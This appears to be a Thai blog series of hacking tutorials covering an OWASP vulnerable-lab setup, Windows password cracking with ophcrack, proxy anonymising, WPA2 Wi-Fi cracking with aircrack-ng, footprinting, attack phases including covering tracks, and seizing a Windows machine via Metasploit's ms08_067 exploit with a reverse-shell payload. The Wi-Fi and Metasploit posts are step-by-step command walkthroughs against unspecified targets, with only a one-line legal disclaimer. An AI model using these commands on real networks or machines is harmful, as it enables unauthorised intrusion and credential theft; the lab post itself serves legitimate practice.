วันอังคารที่ 15 กรกฎาคม พ.ศ. 2557

ตอนที่13 การติดตั้ง OWASP Broken Web Applications Project

OWASP Broken Web Applications Project  เรามาทําความเข้าใจแบบ ง่าย ง่าย กันก่อน  ผมขอเรียกว่า OWASP Broken Web 
มันก็คือ LAB  จําลองเพื่อทดสอบ ช่องโหว่ Web Applications  และใน OWASP Broken Web ยังมีคําแนะนํา  เกียวกับการป้องกัน รวมถึงเทคนิคต่างต่าง  

มาเริ่มกันเลยดีกว่า  สิ่งแรกที่ต้องมี 

1 โปรแกรม VMware ครับ ไม่รู้จักหาใน Google.com

OWASP Broken Web Applications Project 
3.เมือโหลดมาเสร็จทําการแตกไฟล์ ไว้ใน ไดร์ D
4.ต่อมา เปิดโปรแกรม VMware  ครับ  open a Virtual Machine 
5.หลังจากนั้นเลือกไฟล์  ผมทําการเก็บ  OWASP Broken Web Applications Project  ไว้ที่ไดร์ D: 
6.ต่อมากด open  แล้วก็   open
7.จากนั้นก็กด power on this virtual machine  
8.ปล่อยให้ มัน run  กรอกlogin  root    กรอก password  เป็นowaspbwa
9.ต่อมาเรามาดูการใช้งานกัน บ้าง  ให้เปิดเบราเซอร์  แล้ว พิมip ของผมเป็น192.168.18.142 เท่านี้ก็เสร็จสมบูรณ์(แต่ละเครื่องมันจะ set IP ให้ไม่เหมือนกันนะครับ)
10.ต่อมาผมจะมาแนะนําแค่บางหมวด  ผมเลือก เป็น OWASP Mutillidae II  คือเอาไว้เล่นเวลาเหงามือนะครับ จาก รูปจะเห็นว่า  มีช่องโหว่ให้เล่นกันมากมายเลย ทีเดียว  มีทั้งที่เรารู้แล้วก็ไม่รู้  แถมมีVDOสอนในการเจาะช่องโหว่ต่าง

วันจันทร์ที่ 30 กันยายน พ.ศ. 2556

ตอนที่ 12 ถอดรหัส windows ด้วย ophcrack


1.เข้าไปโหลด ophcrack ได้ตามลิงก์นี้ http://ophcrack.sourceforge.net/download.php
2.เลือก download file ที่เป็น iso
3.เอา file ที่ download ไปเขียนลงในแผ่น CD หรือ USB
4.เสียบ USB หรือใส่ CD  แล้วสั่งเครื่องให้ boot USBหรือ CD
5.จากนั้นโปรแกรมจะทำการถอดรหัสโดยอัตโนมัติ ด้วยวิธี Brute Force
วิธีป้องกัน
1.ตั้ง Password ไม่น้อยกว่า 8 ตัวอักษร
2.ใช้อักขระ ตัวพิมพ์ใหญ่ พิมพ์เล็ก สลับกันไป
3.ล็อค Bios ด้วยเลย

วันอาทิตย์ที่ 29 กันยายน พ.ศ. 2556

ตอนที่ 11 ซ่อนตัวด้วย Proxy

1.เข้า google แล้วพิมพ์คำว่า เช็ค IP จะได้ดังรูป

2.เปิดแท็บอีกอันขึ้นมาเข้า google แล้วพิมพ์คำว่า free http proxy list ดังรูป
3.เข้าไปที่การตั้งค่า>เปลี่ยนการตั้งค่าของProxy>lan setting ดังรูป
4.ใส่หมายเลข IP Adress และ Port ที่เราเลือกในข้อ2
5.ลองเข้าไปเช็ค IP เหมือนครั้งแรก ก็จะเห็นว่าตรงกับที่เราเปลี่ยนค่า Proxy ลงไป





วันพุธที่ 25 กันยายน พ.ศ. 2556

ตอน10 crack wifi WPA2

1. พิมพ์คำสั่ง airmon-ng
2. พิมพ์คำสั่ง airmon-ng wlan0
3. พิมพ์คำสั่ง airmon-ng start wlan0
4. พิมพ์คำสั่ง airodump-ng mon0
5. พิมพ์คำสั่ง airodump-ng -c 11 --bssid ตามด้วย mac address -w test1234 mon0
   ** 11 คือ channal  ส่วน test1234 จะตั้งชื่ออะไรก็ได้
6.พิมพ์คำสั่ง aireplay-ng -0 0 -a ตามด้วย mac address ที่ช่อง bssid  -c และตามด้วย mac address ของ station  mon0
7. aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst test1234-01.cap
8.ก็จะได้รหัสมาแล้ว

วันจันทร์ที่ 23 กันยายน พ.ศ. 2556

ตอนที่9 Footprinting

Footprinting คือ การสำรวจระบบของเป้าหมาย ว่ามีประวัติความเป็นมาอย่างไร ใช้ IP Address อะไร มีระบบอะไรเชื่อมโยงกันอยู่บ้าง E-mail Address ของผู้ดูแลระบบคืออะไร หรือแม้แต่ บริษัทนี้ประกอบกิจการอะไร กลุ่มผู้สนใจสินค้าของบริษัทคืออะไร ซึ่งข้อมูลเหล่านี้ก็เปรียบเสมือน แบบพิมพ์เขียวทางระบบความปลอดภัยขององค์กร เลยทีเดียว พวกแฮกเกอร์ทั้งหลายจึงใช้เวลาถึง 90%หมดไปกับการ Footprinting และ อีก 10 % เป็นการโจมตี วิธีการทำ Footprinting  เช่น การใช้คำสั่ง nslookup การใช้คำสั่ง whois เป็นต้น เช่น nslookup www.google.com

วันอาทิตย์ที่ 8 กันยายน พ.ศ. 2556

ตอนที่8 ขั้นตอนการโจมตีของ Hacker

สำหรับวันนี้จะนำขั้นตอนการโจมตีของ Hackerซึ่งอาจจะคล้ายๆการทำงานของหน่วยรบพิเศษ มาให้ได้ลองอ่านเปรียบเทียบกันดูครับว่ามีอะไรบ้าง
Hacker
1.Reconnaissance(การสอดส่อง) คือการเก็บข้อมูลเบื้องต้น คร่าวๆ เช่น การดูเวลาการทำงานของพนักงาน การส่งเอกสาร หรือการหาตำแหน่งของพนักงาน เป็นต้น
2.Scanning(การสแกนระบบ) คือหลังจากที่เราหาข้อมูลเบื้องต้นได้แล้ว ทีนี้เราก็สามารถระบุได้ว่าเราจะเริ่มจากเป้าหมายเป็นใคร เช่น Scan หา IP เครื่องเป้าหมาย หรือแม้กระทั่งรู้ Server ของเป้าหมาย
3.Gaining Access(การเข้าถึงเป้าหมาย) คือ Hacker จะเริ่มเจาะระบบเข้าไปโดยทุกๆวิถีทางเพื่อให้ได้ข้อมูลกลับออกมาได้สำเร็จ
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อ Hacker สามารถเจาะเข้าไปในระบบได้แล้ว เมื่อ Hacker ออกจากระบบแต่อยากเข้ามาได้ข้อมูลอีกในภายภาคหน้า Hacker ก็จะทำการคงสภาพการเข้าถึง เพื่อที่จะกลับเข้ามาได้อีก
5.Covering Tracks(การลบร่องรอย) เมื่อได้ข้อมูลและคงสภาพทางเข้าไว้เรียบร้อย Hacker ก็จะกระทำการลบร่องรอยของตนเองตอนเจาะระบบเข้ามา เพื่อหลีกเลี่ยงการถูกจับกุม
หน่วยรบพิเศษ
1.Reconnaissance(การสอดส่อง) เมื่อหน่วยรบพิเศษจะทำหารโจมตีเป้าหมายก็จะต้องหาข่าวก่อนว่า ศัตรูคือใคร อยู่ที่ไหน กำลังทำอะไร เป็นต้น
2.Scanning(การสแกนระบบ) เมื่อหน่วยรบพิเศษรู้ข้อมูลเบื้องต้นแล้ว ก็จะทำการสำรวจว่าและดูว่าทางด้านไหนศัตรูน้อยที่สุด มีช่องโหว่ไหนง่ายที่สุด
3.Gaining Access(การเข้าถึงเป้าหมาย) เมื่อได้ข้อมูลมามากมายแล้วหน่วยรบพิเศษก็จะทำการวางแผนต่อไปว่าเราจะโจมตีหรือแทรกแซงในรูปแบบไหน ถึงจะได้ข้อมูลออกมาได้ไวที่สุดโดยที่ศัตรูไม่รู้ตัว
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อหน่วยรบพิเศษได้ทำการโจมตีหรือแทรงแซงเข้าไปเรียบร้อยแล้วก็มักจะสร้างเส้นทางที่ปลอดภัยของตัวเองขึ้นมาเพื่อให้สามารถกลับเข้ามาเอาข้อมูลได้อีกครั้งอย่างปลอดภัย
5.Covering Tracks(การลบร่องรอย) เมื่อโจมตีหรือแทรกแซงเสร็จเป็นที่เรียบร้อยหน่วยรบพิเศษจะต้องไม่ลืมลบร่องรอยของตนเองตั้งแต่การหาข้อมูล การโจมตีหรือแทรกแซง โดยที่ไม่ให้ศัตรูรู้ได้เลยว่ามีหน่วยรบพิเศษเข้ามาในฐานของตนเองได้

วันอังคารที่ 20 สิงหาคม พ.ศ. 2556

ตอน7 ยึดเครื่องด้วย metasploit


วันนี้พี่จันจะมาสอนการยึดเครื่องด้วย metasploit กันนะครับ
1. เปิดหน้าต่าง terminalขึ้นมาแล้วพิมพ์คำสั่ง  msfconsole
2.เรียกใช้โมดูล exploit ms08_067_netapi โดยพิมพ์คำสั่ง use exploit/windows/smb/ms08_067_netapi
3.กำหนดให้ไปยังเครื่องเป้าหมาย โดยใช้คำสั่ง set RHOST IPเป้าหมาย
4.กำหนด payload ที่ใช้แนบไปกับexploit โดยใช้คำสั่ง set PAYLOAD windows/meterpeter/reverse_tcp
5.กำหนดหมายเลขIPและพอร์ตของเครื่องเราที่จะให้เชื่อมต่อกลับมาโดยใช้คำสั่ง set LHOST ตามด้วยIPเครื่องเรา และคำสั่ง set LPORT ตามด้วยportที่เปิดไว้
6.จากนั้นเริ่มโจมตีด้วยคำสั่ง exploit เป็นการเสร็จเรียบร้อยสามารถยึดเครื่องได้แล้ว
7.เมื่อเข้ามาแล้วสามารถเช็คเครื่องป้าหมายโดยใช้คำสั่ง sysinfo
ปล.อย่านำไปใช้ในทางที่ผิดกันนะครับ มันเป็นสิ่งไม่ดี ผิด พรบคอมพิวเตอร์กัน